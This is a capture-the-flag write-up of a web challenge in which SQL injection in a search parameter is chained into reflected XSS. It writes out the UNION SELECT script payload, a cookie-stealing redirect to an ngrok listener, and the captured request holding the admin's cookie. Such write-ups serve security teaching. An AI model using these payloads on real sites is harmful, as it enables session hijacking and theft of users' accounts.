Challenge

This is the continuation of Wisdom 1.

Solution

In Wisdom 1 we found a SQL injection in the website’s main page. Now let’s take a look at the second page.

The second page asks for a URL which the admin will take a look at :

If you have done CTFs before, you know that this is a classic XSS challenge, so we need to find a way to get a XSS on this website.

Taking another look back at the first page, I noticed that the query was sent through a GET request, meaning the query was in the URL:

After a little bit of googling I learnt that you can leverage a SQL injection into a RCE by adding PHP code inside your SELECT statement to add it to the page !

Sadly, the PHP code kept getting sanitized by the backend, even after trying all the weird sanitization evasion techniques I knew, but it was still worth to try to inject JavaScript instead:

' AND FALSE UNION SELECT "a", "<script>alert()</script>" FROM quotes; -- -

And it worked !

Finally, using ngrok, I could get the admin’s cookie which contained the flag:

nc -lnvp 8000

Listening for incoming connections with nc

sudo ngrok http 8000

Starting ngrok

' AND FALSE UNION SELECT "a", "<script type='text/javascript'>document.location='https://a3ca-132-203-167-165.ngrok.io/?c='+document.cookie;</script>" FROM quotes; -- -

Full SQLi payload that redirects the user to my ngrok link and appends the cookies

The final link looks like:

http://wisdom.ctf.unitedctf.ca?q=' AND FALSE UNION SELECT "a"%2C "<script>document.location%3D'https%3A%2F%2F027f-74-57-165-14.ngrok.io%2F%3Fc%3D'%2Bdocument.cookie%3B<%2Fscript>" FROM quotes%3B -- -

Submitting the link to the admin

┌─[h3dg3h0g@parrotOS]─[~/Desktop/CTF/UnitedCTF2022/Wisdom 2]
└──╼ $nc -lnvp 8000
listening on [any] 8000 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 35128
GET /?c=flag=FLAG-us3_http_0nly_c0ok13s_4nd_3nf0rc3_csp! HTTP/1.1
Host: 027f-74-57-165-14.ngrok.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/106.0.5249.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Referer: http://wisdom.ctf.unitedctf.ca/
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 2600:1900:2000:a5::1a
X-Forwarded-Proto: https

Received the flag !

This was a great web challenge, mainly because I learnt that you can leverage a SQLi into a RCE by injection PHP into the page. This wasn’t the point of this challenge, but still very cool chain of exploits !